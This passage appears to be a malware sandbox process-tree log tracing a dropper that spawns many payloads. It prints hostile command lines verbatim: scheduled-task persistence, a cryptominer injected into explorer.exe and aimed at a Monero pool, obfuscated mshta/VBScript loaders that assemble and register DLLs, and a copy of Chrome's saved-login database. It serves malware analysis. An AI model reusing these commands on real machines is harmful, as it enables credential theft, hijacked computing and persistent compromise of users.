C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 8249⤵
- Program crash
PID:5612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 9289⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5296
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1536 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
PID:696 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"10⤵PID:5360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"8⤵
- Executes dropped EXE
PID:2648 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2648 -s 15449⤵
- Program crash
PID:5844
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Executes dropped EXE
PID:4472 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"9⤵PID:6692
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵PID:5176
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Creates scheduled task(s)
PID:8992
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵PID:7032
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe11⤵PID:4292
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"12⤵
- Suspicious use of SetThreadContext
PID:6712 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"13⤵PID:8616
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"14⤵PID:7068
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth13⤵
- Drops file in Program Files directory
PID:2252
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe5⤵PID:68
-
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon174a6c5f1664f.exeMon174a6c5f1664f.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4360 -
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon174a6c5f1664f.exeC:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon174a6c5f1664f.exe7⤵
- Executes dropped EXE
PID:1480
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe5⤵PID:2660
-
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17332e41e6b.exeMon17332e41e6b.exe6⤵PID:1484
-
C:\Users\Admin\AppData\Roaming\4197520.exe"C:\Users\Admin\AppData\Roaming\4197520.exe"7⤵
- Executes dropped EXE
PID:3444
-
-
C:\Users\Admin\AppData\Roaming\3482271.exe"C:\Users\Admin\AppData\Roaming\3482271.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1556
-
-
C:\Users\Admin\AppData\Roaming\7933448.exe"C:\Users\Admin\AppData\Roaming\7933448.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1488
-
-
C:\Users\Admin\AppData\Roaming\2453573.exe"C:\Users\Admin\AppData\Roaming\2453573.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4560 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
-
C:\Users\Admin\AppData\Roaming\5149335.exe"C:\Users\Admin\AppData\Roaming\5149335.exe"7⤵
- Executes dropped EXE
PID:1300
-
-
C:\Users\Admin\AppData\Roaming\41575.exe"C:\Users\Admin\AppData\Roaming\41575.exe"7⤵
- Executes dropped EXE
PID:4720
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe5⤵PID:4736
-
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon1708beae021a5ff.exeMon1708beae021a5ff.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4392 -
C:\Windows\system32\mspaint.exeC:\Windows\system32\mspaint.exe7⤵PID:5884
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4392 -s 4927⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1964
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe5⤵PID:4200
-
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon1727c156c4abcec.exeMon1727c156c4abcec.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3136 -
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon1727c156c4abcec.exeC:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon1727c156c4abcec.exe7⤵
- Executes dropped EXE
PID:2080
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe5⤵PID:4920
-
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17afe24e0084db3.exeMon17afe24e0084db3.exe6⤵
- Executes dropped EXE
PID:4180 -
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17afe24e0084db3.exe"C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17afe24e0084db3.exe" -u7⤵
- Executes dropped EXE
PID:2472
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe5⤵PID:2800
-
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exeMon17bbf11fdb575d.exe6⤵
- Executes dropped EXE
PID:4100 -
C:\Users\Admin\AppData\Local\Temp\is-MSOVB.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-MSOVB.tmp\Mon17bbf11fdb575d.tmp" /SL5="$80054,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1872 -
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe"C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe" /SILENT8⤵
- Executes dropped EXE
PID:2120 -
C:\Users\Admin\AppData\Local\Temp\is-IQ678.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-IQ678.tmp\Mon17bbf11fdb575d.tmp" /SL5="$301A8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe" /SILENT9⤵PID:2972
-
C:\Users\Admin\AppData\Local\Temp\is-CI0DS.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-CI0DS.tmp\postback.exe" ss110⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:512
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe5⤵PID:4204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone5⤵PID:2644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2412
-
-
-
-
-
C:\Windows\SysWOW64\control.exe"C:\Windows\SysWOW64\control.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:5528 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\i9iBfSFpiJLNYdkx4pTJj13W.exe"3⤵PID:3316
-
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵PID:8820
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6732
-
-
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:7248
-
-
-
C:\Windows\SysWOW64\msdt.exe"C:\Windows\SysWOW64\msdt.exe"2⤵PID:1984
-
-
C:\Program Files (x86)\Mmx4hv\i4g4vtj2.exe"C:\Program Files (x86)\Mmx4hv\i4g4vtj2.exe"2⤵PID:772
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2852
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2708
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2700
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2484
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2448
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1888
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1436
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1348
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1220
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1096
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:1056 -
C:\Users\Admin\AppData\Roaming\tvssfjcC:\Users\Admin\AppData\Roaming\tvssfjc2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5208
-
-
C:\Users\Admin\AppData\Roaming\tvssfjcC:\Users\Admin\AppData\Roaming\tvssfjc2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:8372
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:356
-
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exeMon175e6c8b40064b8c8.exe1⤵
- Executes dropped EXE
PID:4628 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))2⤵
- Checks whether UAC is enabled
PID:2468 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe") do taskkill -Im "%~NxU" -f3⤵PID:2180
-
C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt4⤵PID:1552
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))5⤵
- Checks whether UAC is enabled
PID:3532
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL"). RUn( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )5⤵
- Checks whether UAC is enabled
PID:5300 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN6⤵PID:5484
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "7⤵PID:3716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"7⤵PID:5460
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /S YLIH.bIN7⤵
- Loads dropped DLL
PID:5664
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Mon175e6c8b40064b8c8.exe" -f4⤵
- Kills process with taskkill
PID:4744
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17a0d8ec302e.exeMon17a0d8ec302e.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3376
-
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bffc2992eb3d.exeMon17bffc2992eb3d.exe /mixone1⤵
- Executes dropped EXE
PID:1376 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 6602⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 6642⤵
- Program crash
PID:1272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 6482⤵
- Program crash
PID:4204
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 6642⤵
- Program crash
PID:3548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 9082⤵
- Program crash
PID:5724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 9682⤵
- Program crash
PID:5548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 11162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5672
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe") do taskkill -Im "%~NxU" -f1⤵PID:3968
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\41575.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\41575.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )1⤵
- Checks whether UAC is enabled
PID:5084 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\41575.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\41575.exe") do taskkill /im "%~nxT" /f2⤵PID:1016
-
C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExELYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5320 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj ""== """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )4⤵
- Checks whether UAC is enabled
PID:5516 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj "== "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f5⤵PID:5792
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl"). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY +JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 ,TRUe ) )4⤵
- Checks whether UAC is enabled
PID:5852 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY+JkOFKWNK.Eo7 +2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S5⤵PID:5544
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "6⤵PID:6388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"6⤵PID:6644
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 .\BgG1KXA.y -U -S6⤵
- Loads dropped DLL
PID:7264
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "41575.exe" /f3⤵
- Kills process with taskkill
PID:5952
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
PID:6196
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5012
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6624 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6756
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵PID:3900
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:6720
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8068 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5384
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6312
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:2780
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8500 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:8516
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:7228 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D87F2DBC0CEB9A7BD92E75F41B77BEBB C2⤵PID:7040
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 927C8C604BA362BEAF53A7756CF817742⤵
- Blocklisted process makes network request
PID:6532 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:6136
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 69B32C96D08DFAFB70153432295E976F E Global\MSI00002⤵PID:3736
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
PID:6464 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2148
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8196 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:204
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:7080
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2308
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6756
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:8388
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7324
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:8792
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1836
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5896
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess1⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
PID:7464 -
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"2⤵
- Modifies registry class
PID:8876
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:9184
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:3228
-
